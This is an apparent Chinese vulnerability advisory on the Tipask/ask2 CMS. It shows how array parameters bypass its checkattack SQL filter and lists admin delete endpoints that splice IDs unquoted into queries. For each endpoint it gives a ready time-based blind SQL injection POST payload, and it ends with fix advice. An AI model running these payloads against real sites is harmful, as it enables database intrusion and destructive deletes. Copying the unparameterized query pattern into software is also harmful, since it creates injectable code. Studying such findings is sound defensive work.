先来看看该套源码的整体防注入:GPC转义+360的防御正则
很粗暴有没有,不过这里利用的是数组全面绕过360的防御正则,然后找到一些没有单引号包含的点,从而绕过单引号转义,绕过这两个,自然可以无限制任意注入初始化过滤在D:\wamp\www\ask2V3.1.1\model\sowenda.class.php中init_request函数,在大概第60行
```
$this->get = taddslashes($this->get, 1);
$this->post = taddslashes(array_merge($_GET, $_POST));
checkattack($this->post, 'post');
checkattack($this->get, 'get');
unset($_POST);
```
这里进行转义,合并get ,post变量,checkattck检测等一些操作,这里如果post输入端提交的变量是数组的话,那么$this->post这个将是一个二维数组,即数组里面套数组,然后被带入到checkattack函数中进行一些正则的检测(这个正则就是360写的,很粗暴,就算绕过,获取的数据也很有限)checkattack函数在D:\wamp\www\tipask\lib\global.func.php中
```
function checkattack($reqarr, $reqtype = 'post') {
$filtertable = array(
'get' => '\'|(and|or)\\b.+?(>|<|=|in|like)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)',
'post' => '\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)',
'cookie' => '\\b(and|or)\\b.{1,6}?(=|>|<|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)'
);
foreach ($reqarr as $reqkey => $reqvalue) {
if (preg_match("/" . $filtertable[$reqtype] . "/is", $reqvalue) == 1 && !in_array($reqkey, array('content'))) {
print('Illegal operation!');
exit(-1);
}
}
}
```
可以看到如果$reqarr是一维数组的话,那么自然被过滤了,如果$reqarr是二维数组的话,就绕过了这个函数
在D:\wamp\www\ask2V3.1.1\control\message.php中的onremove函数
```
function onremove() {
if (isset($this->post['submit'])) {
$inbox = $this->post['messageid']['inbox'];
$outbox = $this->post['messageid']['outbox'];
if ($inbox)
$_ENV['message']->remove("inbox", $inbox);
if ($outbox)
$_ENV['message']->remove("outbox", $outbox);
$this->message("消息删除成功!", get_url_source());
}
}
```
如果我提交的变量messageid是数组(包含inbox和outbox)的话,自然可以绕过上面说的哪两种防注入,然后inbox和outbox变量分别被带入
```
$_ENV['message']->remove("inbox", $inbox);
$_ENV['message']->remove("outbox", $outbox);
```
执行,跟进remove函数
```
function remove($type, $msgids) {
$messageid = ($msgids && is_array($msgids)) ? implode(",", $msgids) : $msgids;
if ('inbox' == $type) {
$this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE fromuid=0 AND `id` IN ($messageid)");
$this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE status = 1 AND `id` IN ($messageid)");
$this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=2 WHERE status=0 AND `id` IN ($messageid)");
} else {
$this->db->query("DELETE FROM " . DB_TABLEPRE . "message WHERE status = 2 AND `id` IN ($messageid)");
$this->db->query("UPDATE " . DB_TABLEPRE . "message SET status=1 WHERE status=0 AND `id` IN ($messageid)");
}
}
```
可以看到变量msgids直接被拼接到了SQL语句中,造成注入
以上内容来自用户 @404notfound
---
### 0x00 漏洞分析
首先我们需要有管理员的账号密码,在本系统中默认是admin/admin。
关于如何绕过`checkattack`函数请看https://www.seebug.org/vuldb/ssvid-92230
下面来看注入点:
- `/control/admin/word.php`第24-34行:
```php
function onadd() {
if (isset($this->post['submit']) && $this->post['id']) {
$ids = implode(",", $this->post['id']);
$_ENV['badword']->remove_by_id($ids);
$message = "删除成功!";
} else {
$_ENV['badword']->add($this->post['wid'], $this->post['find'], $this->post['replacement'], $this->user['username']);
$message = "修改成功!";
}
$this->ondefault($message);
}
```
我们为绕过`checkout`传递的数组到这里被逐项连接起来然后传入`remove_by_id`函数,跟进`/model/badword.class.php`第46-48行:
```php
function remove_by_id($ids){
$this->db->query("DELETE FROM ".DB_TABLEPRE."badword WHERE `id` IN ($ids)");
}
```
连接后的数组直接被带入查询且无需引号闭合,可以进行注入,可以通过如下请求进行测试(注:**所有这些注入点都涉及到删除请求,请谨慎测试**)
- URL:http://127.0.0.1:8888/index.php?admin_word/add
- POST: `submit=111&id[]=111&id[]=111 and (select * from (select sleep(5))a)`
提交后我们可以发现延时现象,或者当MySQL开启query log的时候我们可以通过查query log来确定语句的执行。以下几处问题类似,不再详细说明。
- `/control/admin/note.php`第50-58行:
```php
function onremove() {
$message = '没有选择公告!';
if (isset($this->post['delete'])) {
$ids = implode(",", $this->post['delete']);
$_ENV['note']->remove_by_id($ids);
$message = '公告刪除成功!';
}
$this->ondefault($message);
}
```
`/model/note.class.php`第51-53行:
```php
function remove_by_id($ids) {
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "note` WHERE `id` IN ($ids)");
}
```
- URL:http://127.0.0.1:8888/index.php?admin_note/remove
- POST: `delete[]=111&delete[]=111 and (select * from (select sleep(5))a)`
- `/control/admin/datacall.php`第52-58行:
```php
function onremove() {
if(isset($this->post['delete'])) {
$ids = implode($this->post['delete'],",");
$_ENV['datacall']->remove_by_id($ids);
$this->ondefault();
}
}
```
`/model/datacall.class.php`第40-42行:
```php
function remove_by_id($ids) {
$this->db->query("DELETE FROM `".DB_TABLEPRE."datacall` WHERE `id` IN ($ids)");
}
```
- URL:http://127.0.0.1:8888/index.php?admin_datacall/remove
- POST: `delete[]=111&delete[]=111 and (select * from (select sleep(5))a)`
- `/control/admin/gift.php`第123-132行:
```php
function onremove() {
$message = '没有选择礼品!';
if (isset($this->post['gid'])) {
$gids = implode(",", $this->post['gid']);
$_ENV['gift']->remove_by_id($gids);
$message = '礼品删除成功!';
unset($this->get);
}
$this->ondefault($message);
}
```
`/model/gift.class.php`第60-62行:
```php
function remove_by_id($ids) {
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "gift` WHERE `id` IN ($ids)");
}
```
- URL:http://127.0.0.1:8888/index.php?admin_gift/remove
- POST: `gid[]=111&gid[]=111 and (select * from (select sleep(5))a)`
- `/control/admin/category.php`第97-104行:
```php
function onremove() {
if (isset($this->post['cid'])) {
$cids = implode(",", $this->post['cid']);
$pid = intval($this->post['hiddencid']);
$_ENV['category']->remove($cids);
$this->onview($pid, '分类删除成功!');
}
}
```
`/model/category.class.php`第172-176行:
```php
function remove($cids) {
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "category` WHERE `id` IN ($cids)");
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "question` WHERE `cid` IN ($cids)");
}
```
- URL:http://127.0.0.1:8888/index.php?admin_category/remove
- POST: `hiddencid=111&cid[]=111&cid[]=111 and (select * from (select sleep(5))a)`
- `/control/admin/expert.php`第52-59行:
```php
function onremove() {
if (count($this->post['delete'])) {
$_ENV['expert']->remove(implode(',', $this->post['delete']));
$type = 'correctmsg';
$message = "删除成功!";
$this->ondefault($message);
}
}
```
`/model/expert.class.php`第55-58行:
```php
function remove($uids) {
$this->db->query("UPDATE " . DB_TABLEPRE . "user SET `expert`=0 WHERE uid IN ($uids)");
$this->db->query("DELETE FROM " . DB_TABLEPRE . "user_category WHERE uid IN ($uids)");
}
```
- URL:http://127.0.0.1:8888/index.php?admin_expert/remove
- POST: `delete[]=111&delete[]=111 and (select * from (select sleep(5))a)`
- `/control/admin/topic.php`第132-138行:
```php
function onremove() {
if (isset($this->post['tid'])) {
$tids = implode(",", $this->post['tid']);
$_ENV['topic']->remove($tids);
$this->ondefault('专题删除成功!');
}
}
```
`/model/topic.class.php`第174-177行:
```php
function remove($tids) {
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "topic` WHERE `id` IN ($tids)");
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "tid_qid` WHERE `tid` IN ($tids)");
}
```
- URL:http://127.0.0.1:8888/index.php?admin_topic/remove
- POST: `tid[]=111&tid[]=111 and (select * from (select sleep(5))a)`
- `/control/admin/user.php`第98-105行:
```php
function onremove() {
if (isset($this->post['uid'])) {
$uids = implode(",", $this->post['uid']);
$all = isset($this->get[2]) ? 1 : 0;
$_ENV['user']->remove($uids, $all);
$this->ondefault('用户删除成功!');
}
}
```
`/model/user.class.php`第233-242行:
```php
function remove($uids, $all = 0) {
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "user` WHERE `uid` IN ($uids)");
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "famous` WHERE `uid` IN ($uids)");
/* 删除问题和回答 */
if ($all) {
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "question` WHERE `authorid` IN ($uids)");
$this->db->query("DELETE FROM `" . DB_TABLEPRE . "answer` WHERE `authorid` IN ($uids)");
$this->db->query("UPDATE `" . DB_TABLEPRE . "question` SET answers=answers-1 WHERE `authorid` IN ($uids)");
}
}
```
- URL:http://127.0.0.1:8888/index.php?admin_user/remove
- POST: `tid[]=111&tid[]=111 and (select * from (select sleep(5))a)`
### 0x01 修复建议
- 对厂商来讲,采用参数化查询
- 对用户来讲,在厂商更新后及时进行更新
### 0x02 参考
https://www.seebug.org/vuldb/ssvid-92230
京公网安备 11010502034610号
暂无评论